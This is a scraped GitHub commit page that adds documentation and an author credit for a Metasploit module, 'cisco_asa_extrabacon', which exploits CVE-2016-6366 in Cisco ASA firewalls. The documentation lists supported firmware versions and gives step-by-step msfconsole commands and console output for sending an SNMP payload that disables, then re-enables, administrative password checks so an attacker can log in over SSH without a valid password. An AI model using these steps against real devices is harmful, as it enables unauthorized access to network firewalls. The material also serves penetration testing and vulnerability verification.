Skip to content

Commit 90bd2a9

Browse files
author
zerosum0x0
authored
Merge pull request #1 from bcook-r7/land-7353-bacon-too
Add module docs, credit
2 parents cd4299b + df28e2a commit 90bd2a9

File tree

2 files changed

+116
-0
lines changed

2 files changed

+116
-0
lines changed
Lines changed: 115 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,115 @@
1+
## General notes
2+
3+
This is using improved shellcode, has less stages than the Equation Group
4+
version making it more reliable. This makes the SNMP payload packet ~150 less
5+
bytes. Also, the leaked version only supports 8.x, we have it working on 9.x
6+
versions.
7+
8+
To add more version specific offsets, more details and a Lina file offset
9+
finder are available at:
10+
11+
https://github.com/RiskSense-Ops/CVE-2016-6366
12+
13+
## Partial list of supported versions
14+
------------------------------------------------------------
15+
All of the leaked versions are available in the module
16+
17+
- 8.x
18+
- 8.0(2)
19+
- 8.0(3)
20+
- 8.0(3)6
21+
- 8.0(4)
22+
- 8.0(4)32
23+
- 8.0(5)
24+
- 8.2(1)
25+
- 8.2(2)
26+
- 8.2(3)
27+
- 8.2(4)
28+
- 8.2(5)
29+
- 8.2(5)33 `*`
30+
- 8.2(5)41 `*`
31+
- 8.3(1)
32+
- 8.3(2)
33+
- 8.3(2)39 `*`
34+
- 8.3(2)40 `*`
35+
- 8.3(2)-npe `*` `**`
36+
- 8.4(1)
37+
- 8.4(2)
38+
- 8.4(3)
39+
- 8.4(4)
40+
- 8.4(4)1 `*`
41+
- 8.4(4)3 `*`
42+
- 8.4(4)5 `*`
43+
- 8.4(4)9 `*`
44+
- 8.4(6)5 `*`
45+
- 8.4(7) `*`
46+
- 9.x
47+
- 9.0(1) `*`
48+
- 9.1(1)4 `*`
49+
- 9.2(1) `*`
50+
- 9.2(2)8 `*`
51+
- 9.2(3) `*`
52+
- 9.2(4) `*`
53+
- 9.2(4)13 `*`
54+
55+
`*` new version support not part of the original Shadow Brokers leak
56+
57+
`**` We currently can't distinguish between normal and NPE versions from the SNMP strings. We've commented out the NPE offsets, as NPE is very rare (it is for exporting to places where encryption is crappy), but in the future, we'd like to incorporate these versions. Perhaps as a bool option?
58+
59+
## Verification
60+
61+
- Start `msfconsole`
62+
- `use auxiliary/admin/cisco/cisco_asa_extrabacon`
63+
- `set RHOST x.x.x.x`
64+
- `check`
65+
- `run`
66+
- ssh [email protected], you will not need a valid password
67+
- `set MODE pass-enable`
68+
- `run`
69+
- ssh [email protected], ensure fake password does not work
70+
71+
## Checking for a vulnerable version
72+
73+
```
74+
msf > use auxiliary/admin/cisco/cisco_asa_extrabacon
75+
msf auxiliary(cisco_asa_extrabacon) > set rhost 192.168.1.1
76+
rhost => 192.168.1.1
77+
msf auxiliary(cisco_asa_extrabacon) > check
78+
79+
[+] Payload for Cisco ASA version 8.2(1) available!
80+
[*] 192.168.1.1:161 The target appears to be vulnerable.
81+
```
82+
83+
## Disabling administrative password
84+
85+
```
86+
msf auxiliary(cisco_asa_extrabacon) > set
87+
set ACTION set ConsoleLogging set Prompt set RHOST set TimestampOutput
88+
set CHOST set LogLevel set PromptChar set RPORT set VERBOSE
89+
set COMMUNITY set MODE set PromptTimeFormat set SessionLogging set VERSION
90+
set CPORT set MinimumRank set RETRIES set TIMEOUT set WORKSPACE
91+
msf auxiliary(cisco_asa_extrabacon) > set MODE pass-
92+
set MODE pass-disable set MODE pass-enable
93+
msf auxiliary(cisco_asa_extrabacon) > set MODE pass-disable
94+
MODE => pass-disable
95+
msf auxiliary(cisco_asa_extrabacon) > run
96+
97+
[*] Building pass-disable payload for version 8.2(1)...
98+
[*] Sending SNMP payload...
99+
[+] Clean return detected!
100+
[!] Don't forget to run pass-enable after logging in!
101+
[*] Auxiliary module execution completed
102+
```
103+
104+
## Re-enabling administrative password
105+
106+
```
107+
msf auxiliary(cisco_asa_extrabacon) > set MODE pass-enable
108+
MODE => pass-enable
109+
msf auxiliary(cisco_asa_extrabacon) > run
110+
111+
[*] Building pass-enable payload for version 8.2(1)...
112+
[*] Sending SNMP payload...
113+
[+] Clean return detected!
114+
[*] Auxiliary module execution completed
115+
```

modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -22,6 +22,7 @@ def initialize
2222
'Zachary Harding <[email protected]>',
2323
'Nate Caroe <[email protected]>',
2424
'Dylan Davis <[email protected]>',
25+
'William Webb <william_webb[at]rapid7.com>', # initial module and ASA hacking notes
2526
'Equation Group',
2627
'Shadow Brokers'
2728
],

0 commit comments

Comments
 (0)